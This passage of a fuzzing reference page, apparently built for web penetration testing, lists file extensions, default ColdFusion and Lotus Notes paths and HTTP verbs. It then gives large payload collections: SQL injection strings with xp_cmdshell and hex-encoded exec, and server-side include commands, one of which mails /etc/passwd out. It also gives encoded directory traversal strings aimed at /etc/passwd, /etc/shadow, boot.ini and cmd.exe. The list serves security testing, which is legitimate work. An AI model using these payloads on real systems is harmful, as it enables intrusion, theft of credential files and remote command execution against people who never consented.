.pea<br />
.pet<br />
.pf<br />
.pim<br />
.pit<br />
.piz<br />
.pkg<br />
.pup<br />
.puz<br />
.pwa<br />
.qda<br />
.r0<br />
.r00<br />
.r01<br />
.r02<br />
.r03<br />
.r1<br />
.r2<br />
.r30<br />
.rar<br />
.rev<br />
.rk<br />
.rnc<br />
.rp9<br />
.rpm<br />
.rte<br />
.rz<br />
.rzs<br />
.s00<br />
.s01<br />
.s02<br />
.s7z<br />
.sar<br />
.sdc<br />
.sdn<br />
.sea<br />
.sen<br />
.sfs<br />
.sfx<br />
.sh<br />
.shar<br />
.shk<br />
.shr<br />
.sit<br />
.sitx<br />
.spt<br />
.sqx<br />
.sqz<br />
.tar<br />
.tar.gz<br />
.tar.xz<br />
.taz<br />
.tbz<br />
.tbz2<br />
.tg<br />
.tgz<br />
.tlz<br />
.tlzma<br />
.txz<br />
.tz<br />
.uc2<br />
.uha<br />
.vem<br />
.vsi<br />
.wad<br />
.war<br />
.wot<br />
.xef<br />
.xez<br />
.xmcdz<br />
.xpi<br />
.xx<br />
.xz<br />
.y<br />
.yz<br />
.z<br />
.z01<br />
.z02<br />
.z03<br />
.z04<br />
.zap<br />
.zfsendtotarget<br />
.zip<br />
.zipx<br />
.zix<br />
.zoo<br />
.zpi<br />
.zz</pre><br />
<br />
=== Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) ===<br />
<pre><br />
# Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.3me<br />
.3pe<br />
.4dl<br />
.8xk<br />
.^^^<br />
.aao<br />
.ab2<br />
.aca<br />
.accdb<br />
.acf<br />
.acg<br />
.agd<br />
.an1<br />
.anme<br />
.arc<br />
.arh<br />
.ast<br />
.att<br />
.aw<br />
.bafl<br />
.bdf<br />
.bfx<br />
.bjo<br />
.bld<br />
.blg<br />
.btf<br />
.btif<br />
.btr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.chk<br />
.ckd<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.cmbl<br />
.contact<br />
.cpi<br />
.cpmz<br />
.csv<br />
.cwz<br />
.cxt<br />
.daf<br />
.dat<br />
.data<br />
.db<br />
.dcf<br />
.ddt<br />
.dex<br />
.dif<br />
.dmsk<br />
.dnc<br />
.dpx<br />
.dsd<br />
.dt1<br />
.dt2<br />
.dta<br />
.e00<br />
.ec0<br />
.edf<br />
.eep<br />
.efx<br />
.enc<br />
.enw<br />
.epw<br />
.est<br />
.et<br />
.eta<br />
.ev3<br />
.exif<br />
.exp<br />
.fbl<br />
.fdb<br />
.fid<br />
.fol<br />
.gdb<br />
.gen<br />
.gnp<br />
.gpi<br />
.gpx<br />
.hcp<br />
.hdf<br />
.hmt<br />
.hsk<br />
.htg<br />
.id2<br />
.ii<br />
.img<br />
.ink<br />
.ins<br />
.irr<br />
.irx<br />
.iw<br />
.jdb<br />
.jnt<br />
.job<br />
.jrprint<br />
.kmz<br />
.lbx<br />
.lex<br />
.lgf<br />
.lgl<br />
.lib<br />
.liveupdate<br />
.lnt<br />
.lst<br />
.m<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mdb<br />
.mem<br />
.menc<br />
.met<br />
.mmf<br />
.mng<br />
.mpd<br />
.mpp<br />
.ms10<br />
.muf<br />
.mw<br />
.mwf<br />
.mwx<br />
.nc<br />
.ndx<br />
.nfo<br />
.not<br />
.ns2<br />
.ns3<br />
.ns4<br />
.ntx<br />
.numbers<br />
.ods<br />
.oeaccount<br />
.omcs<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.orx<br />
.out<br />
.ov2<br />
.ovf<br />
.paf<br />
.pbd<br />
.pcr<br />
.pdb<br />
.pdx<br />
.peb<br />
.pec<br />
.pfc<br />
.pis<br />
.pln<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pos<br />
.postal<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.pre<br />
.prf<br />
.psa<br />
.psf<br />
.pst<br />
.ptz<br />
.q07<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qfx<br />
.qpf<br />
.qpw<br />
.qsd<br />
.rcd<br />
.rdx<br />
.ref<br />
.rmuf<br />
.roi<br />
.rrt<br />
.rvt<br />
.rwg<br />
.saf<br />
.sam07<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sds<br />
.ser<br />
.sgn<br />
.shs<br />
.skc<br />
.slk<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sql<br />
.stf<br />
.stl<br />
.stm<br />
.sy3<br />
.t08<br />
.t09<br />
.t2<br />
.tax2009<br />
.tdl<br />
.tdt<br />
.te<br />
.teacher<br />
.tmw<br />
.tol<br />
.trk<br />
.trs<br />
.trx<br />
.tsv<br />
.uccapilog<br />
.ud<br />
.udeb<br />
.uds<br />
.update<br />
.uwl<br />
.val<br />
.vcf<br />
.vdb<br />
.vfs<br />
.vip<br />
.vle<br />
.vlg<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb3<br />
.wdq<br />
.wfd<br />
.wfm<br />
.windowslivecontact<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wks<br />
.wlmp<br />
.wpc<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xds<br />
.xfd<br />
.xl<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsx<br />
.xltm<br />
.xltx<br />
.xml<br />
.xmpz<br />
.xsl<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===<br />
<pre><br />
# Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
CFIDE/Administrator/<br />
CFIDE/Administrator/index.cfm<br />
CFIDE/Administrator/login.cfm<br />
CFIDE/Administrator/Application.cfm<br />
CFIDE/Application.cfm<br />
CFIDE/adminapi/<br />
CFIDE/adminapi/Application.cfm<br />
CFIDE/adminapi/administrator.cfc<br />
CFIDE/adminapi/base.cfc<br />
CFIDE/adminapi/customtags/<br />
CFIDE/adminapi/customtags/l10n.cfm<br />
CFIDE/adminapi/customtags/resources<br />
CFIDE/adminapi/customtags/resources/<br />
CFIDE/adminapi/datasource.cfc<br />
CFIDE/adminapi/debugging.cfc<br />
CFIDE/adminapi/eventgateway.cfc<br />
CFIDE/adminapi/extensions.cfc<br />
CFIDE/adminapi/mail.cfc<br />
CFIDE/adminapi/runtime.cfc<br />
CFIDE/adminapi/security.cfc<br />
CFIDE/adminapi/_datasource/<br />
CFIDE/adminapi/_datasource/formatjdbcurl.cfm<br />
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm<br />
CFIDE/adminapi/_datasource/geturldefaults.cfm<br />
CFIDE/adminapi/_datasource/setdsn.cfm<br />
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm<br />
CFIDE/adminapi/_datasource/setsldatasource.cfm<br />
CFIDE/classes/<br />
CFIDE/classes/cf-j2re-win.cab<br />
CFIDE/classes/cfapplets.jar<br />
CFIDE/classes/images<br />
CFIDE/componentutils/<br />
CFIDE/componentutils/Application.cfm<br />
CFIDE/componentutils/cfcexplorer.cfc<br />
CFIDE/componentutils/cfcexplorer_utils.cfm<br />
CFIDE/componentutils/componentdetail.cfm<br />
CFIDE/componentutils/componentdoc.cfm<br />
CFIDE/componentutils/componentlist.cfm<br />
CFIDE/componentutils/gatewaymenu<br />
CFIDE/componentutils/gatewaymenu/<br />
CFIDE/componentutils/gatewaymenu/menu.cfc<br />
CFIDE/componentutils/gatewaymenu/menunode.cfc<br />
CFIDE/componentutils/login.cfm<br />
CFIDE/componentutils/packagelist.cfm<br />
CFIDE/componentutils/utils.cfc<br />
CFIDE/componentutils/_component_cfcToHTML.cfm<br />
CFIDE/componentutils/_component_cfcToMCDL.cfm?<br />
CFIDE/componentutils/_component_style.cfm<br />
CFIDE/componentutils/_component_utils.cfm<br />
CFIDE/debug/<br />
CFIDE/debug/images/<br />
CFIDE/debug/includes/<br />
CFIDE/images/<br />
CFIDE/images/skins/<br />
CFIDE/install.cfm<br />
CFIDE/installers/<br />
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp<br />
CFIDE/installers/CFReportBuilderInstaller.exe<br />
CFIDE/probe.cfm<br />
CFIDE/scripts/<br />
CFIDE/scripts/css/<br />
CFIDE/scripts/xsl/<br />
CFIDE/wizards/<br />
CFIDE/wizards/common/<br />
CFIDE/wizards/common/utils.cfc</pre><br />
<br />
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31) ===<br />
<pre><br />
# ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
OPTIONS<br />
GET<br />
HEAD<br />
POST<br />
PUT<br />
DELETE<br />
TRACE<br />
CONNECT<br />
PROPFIND<br />
PROPPATCH<br />
MKCOL<br />
COPY<br />
MOVE<br />
LOCK<br />
UNLOCK<br />
VERSION-CONTROL<br />
REPORT<br />
CHECKOUT<br />
CHECKIN<br />
UNCHECKOUT<br />
MKWORKSPACE<br />
UPDATE<br />
LABEL<br />
MERGE<br />
BASELINE-CONTROL<br />
MKACTIVITY<br />
ORDERPATCH<br />
ACL<br />
PATCH<br />
SEARCH<br />
ARBITRARY<br />
</pre><br />
<br />
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111) ===<br />
<pre>/852566C90012664F<br />
/admin4.nsf<br />
/admin5.nsf<br />
/admin.nsf<br />
/agentrunner.nsf<br />
/alog.nsf<br />
/a_domlog.nsf<br />
/bookmark.nsf<br />
/busytime.nsf<br />
/catalog.nsf<br />
/certa.nsf<br />
/certlog.nsf<br />
/certsrv.nsf<br />
/chatlog.nsf<br />
/clbusy.nsf<br />
/cldbdir.nsf<br />
/clusta4.nsf<br />
/collect4.nsf<br />
/da.nsf<br />
/dba4.nsf<br />
/dclf.nsf<br />
/DEASAppDesign.nsf<br />
/DEASLog01.nsf<br />
/DEASLog02.nsf<br />
/DEASLog03.nsf<br />
/DEASLog04.nsf<br />
/DEASLog05.nsf<br />
/DEASLog.nsf<br />
/decsadm.nsf<br />
/decslog.nsf<br />
/DEESAdmin.nsf<br />
/dirassist.nsf<br />
/doladmin.nsf<br />
/domadmin.nsf<br />
/domcfg.nsf<br />
/domguide.nsf<br />
/domlog.nsf<br />
/dspug.nsf<br />
/events4.nsf<br />
/events5.nsf<br />
/events.nsf<br />
/event.nsf<br />
/homepage.nsf<br />
/iNotes/Forms5.nsf/$DefaultNav<br />
/jotter.nsf<br />
/leiadm.nsf<br />
/leilog.nsf<br />
/leivlt.nsf<br />
/log4a.nsf<br />
/log.nsf<br />
/l_domlog.nsf<br />
/mab.nsf<br />
/mail10.box<br />
/mail1.box<br />
/mail2.box<br />
/mail3.box<br />
/mail4.box<br />
/mail5.box<br />
/mail6.box<br />
/mail7.box<br />
/mail8.box<br />
/mail9.box<br />
/mail.box<br />
/msdwda.nsf<br />
/mtatbls.nsf<br />
/mtstore.nsf<br />
/names.nsf<br />
/nntppost.nsf<br />
/nntp/nd000001.nsf<br />
/nntp/nd000002.nsf<br />
/nntp/nd000003.nsf<br />
/ntsync45.nsf<br />
/perweb.nsf<br />
/qpadmin.nsf<br />
/quickplace/quickplace/main.nsf<br />
/reports.nsf<br />
/sample/siregw46.nsf<br />
/schema50.nsf<br />
/setupweb.nsf<br />
/setup.nsf<br />
/smbcfg.nsf<br />
/smconf.nsf<br />
/smency.nsf<br />
/smhelp.nsf<br />
/smmsg.nsf<br />
/smquar.nsf<br />
/smsolar.nsf<br />
/smtime.nsf<br />
/smtpibwq.nsf<br />
/smtpobwq.nsf<br />
/smtp.box<br />
/smtp.nsf<br />
/smvlog.nsf<br />
/srvnam.htm<br />
/statmail.nsf<br />
/statrep.nsf<br />
/stauths.nsf<br />
/stautht.nsf<br />
/stconfig.nsf<br />
/stconf.nsf<br />
/stdnaset.nsf<br />
/stdomino.nsf<br />
/stlog.nsf<br />
/streg.nsf<br />
/stsrc.nsf<br />
/userreg.nsf<br />
/vpuserinfo.nsf<br />
/webadmin.nsf<br />
/web.nsf<br />
/.nsf/../winnt/win.ini<br />
/?Open <br />
</pre><br />
<br />
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===<br />
<pre>Statement<br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
"a"" or 1=1--"<br />
or a = a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
'<br />
'%20or%20''='<br />
'%20or%20'x'='x<br />
%20or%20x=x<br />
')%20or%20('x'='x<br />
0 or 1=1<br />
' or 0=0 --<br />
" or 0=0 --<br />
or 0=0 --<br />
' or 0=0 #<br />
or 0=0 #"<br />
or 0=0 #<br />
' or 1=1--<br />
" or 1=1--<br />
' or '1'='1'--<br />
' or 1 --'<br />
or 1=1--<br />
or%201=1<br />
or%201=1 --<br />
' or 1=1 or ''='<br />
or 1=1 or ""=<br />
' or a=a--<br />
or a=a<br />
') or ('a'='a<br />
) or (a=a<br />
hi or a=a<br />
hi or 1=1 --"<br />
hi' or 1=1 --<br />
hi' or 'a'='a<br />
hi') or ('a'='a<br />
"hi"") or (""a""=""a"<br />
'hi' or 'x'='x';<br />
@variable<br />
,@variable<br />
PRINT<br />
PRINT @@variable<br />
select<br />
insert<br />
as<br />
or<br />
procedure<br />
limit<br />
order by<br />
asc<br />
desc<br />
delete<br />
update<br />
distinct<br />
having<br />
truncate<br />
replace<br />
like<br />
handler<br />
bfilename<br />
' or username like '%<br />
' or uname like '%<br />
' or userid like '%<br />
' or uid like '%<br />
' or user like '%<br />
exec xp<br />
exec sp<br />
'; exec master..xp_cmdshell<br />
'; exec xp_regread<br />
t'exec master..xp_cmdshell 'nslookup www.google.com'--<br />
--sp_password<br />
\x27UNION SELECT<br />
' UNION SELECT<br />
' UNION ALL SELECT<br />
' or (EXISTS)<br />
' (select top 1<br />
'||UTL_HTTP.REQUEST<br />
1;SELECT%20*<br />
to_timestamp_tz<br />
tz_offset<br />
&lt;&gt;"'%;)(&amp;+<br />
'%20or%201=1<br />
%27%20or%201=1<br />
%20$(sleep%2050)<br />
%20'sleep%2050'<br />
char%4039%41%2b%40SELECT<br />
&amp;apos;%20OR<br />
'sqlattempt1<br />
(sqlattempt2)<br />
|<br />
%7C<br />
*|<br />
%2A%7C<br />
*(|(mail=*))<br />
%2A%28%7C%28mail%3D%2A%29%29<br />
*(|(objectclass=*))<br />
%2A%28%7C%28objectclass%3D%2A%29%29<br />
(<br />
%28<br />
)<br />
%29<br />
&amp;<br />
%26<br />
!<br />
%21<br />
' or 1=1 or ''='<br />
' or ''='<br />
x' or 1=1 or 'x'='y<br />
/<br />
//<br />
//*<br />
*/*<br />
a' or 3=3--<br />
"a"" or 3=3--"<br />
' or 3=3<br />
‘ or 3=3 --<br />
</pre> <br />
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4) ===<br />
<pre><br />
# Some server side include statements<br />
# Florian Roth @4nc4p<br />
<br />
&lt;!--#exec cmd="/bin/ls /" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="cat /etc/passwd" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="find / -name *.* -print" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="mail Florian Roth @4nc4p &lt;mailto:Florian Roth @4nc4p&gt; &lt; cat /etc/passwd" --&gt;&lt;br/&gt;<br />
</pre><br />
<br />
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===<br />
<pre>Statement<br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
../../../../../../../../../../../../etc/hosts%00<br />
../../../../../../../../../../../../etc/hosts<br />
../../boot.ini<br />
/../../../../../../../../%2A<br />
../../../../../../../../../../../../etc/passwd%00<br />
../../../../../../../../../../../../etc/passwd<br />
../../../../../../../../../../../../etc/shadow%00<br />
../../../../../../../../../../../../etc/shadow<br />
/../../../../../../../../../../etc/passwd^^<br />
/../../../../../../../../../../etc/shadow^^<br />
/../../../../../../../../../../etc/passwd<br />
/../../../../../../../../../../etc/shadow<br />
/./././././././././././etc/passwd<br />
/./././././././././././etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
/..\../..\../..\../..\../..\../..\../etc/passwd<br />
/..\../..\../..\../..\../..\../..\../etc/shadow<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
%0a/bin/cat%20/etc/passwd<br />
%0a/bin/cat%20/etc/shadow<br />
%00/etc/passwd%00<br />
%00/etc/shadow%00<br />
%00../../../../../../etc/passwd<br />
%00../../../../../../etc/shadow<br />
/../../../../../../../../../../../etc/passwd%00.jpg<br />
/../../../../../../../../../../../etc/passwd%00.html<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini<br />
\\&amp;apos;/bin/cat%20/etc/passwd\\&amp;apos;<br />
\\&amp;apos;/bin/cat%20/etc/shadow\\&amp;apos;<br />
../../../../../../../../conf/server.xml<br />
/../../../../../../../../bin/id|<br />
C:/inetpub/wwwroot/global.asa<br />
C:\inetpub\wwwroot\global.asa<br />
C:/boot.ini<br />
C:\boot.ini<br />
../../../../../../../../../../../../localstart.asp%00<br />
../../../../../../../../../../../../localstart.asp<br />
../../../../../../../../../../../../boot.ini%00<br />
../../../../../../../../../../../../boot.ini<br />
/./././././././././././boot.ini<br />
/../../../../../../../../../../../boot.ini%00<br />
/../../../../../../../../../../../boot.ini<br />
/..\../..\../..\../..\../..\../..\../boot.ini<br />
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini<br />
\..\..\..\..\..\..\..\..\..\..\boot.ini<br />
..\..\..\..\..\..\..\..\..\..\boot.ini%00<br />
..\..\..\..\..\..\..\..\..\..\boot.ini<br />
/../../../../../../../../../../../boot.ini%00.html<br />
/../../../../../../../../../../../boot.ini%00.jpg<br />
/.../.../.../.../.../<br />
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini<br />
</pre> <br />
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".'' <br />
<br />
=== XSS Discovery Statements ===<br />
<br />
Discovery Statements<br />
<pre># Discovery Statements (July 2007)<br />
# Statements used to cause exploitable errors<br />
# Florian Roth @4nc4p<br />
<br />
